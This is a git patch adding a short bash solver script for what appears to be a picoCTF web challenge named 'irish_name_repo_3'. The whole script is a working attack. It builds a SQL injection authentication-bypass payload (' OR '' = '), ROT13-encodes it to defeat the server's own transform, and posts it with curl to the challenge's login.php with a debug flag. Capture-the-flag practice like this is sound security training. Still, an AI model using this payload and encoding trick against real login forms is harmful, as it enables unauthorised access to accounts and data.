From 7fcc8e4cc89c32b18632f27ec7eddc3324cfee07 Mon Sep 17 00:00:00 2001 From: h7x4 Date: Sun, 5 Jul 2026 06:43:47 +0900 Subject: [PATCH] web/irish_name_repo_3 --- web/irish_name_repo_3/solve.sh | 8 ++++++++ 1 file changed, 8 insertions(+) create mode 100755 web/irish_name_repo_3/solve.sh diff --git a/web/irish_name_repo_3/solve.sh b/web/irish_name_repo_3/solve.sh new file mode 100755 index 0000000..588ad5e --- /dev/null +++ b/web/irish_name_repo_3/solve.sh @@ -0,0 +1,8 @@ +#!/usr/bin/env bash + +PAYLOAD_RAW="' OR '' = '" +PAYLOAD="$(tr 'A-Za-z' 'N-ZA-Mn-za-m' <<<"$PAYLOAD_RAW")" + +curl 'http://fickle-tempest.picoctf.net:49659/login.php' \ + -X POST \ + --data-raw "debug=1&password=$PAYLOAD"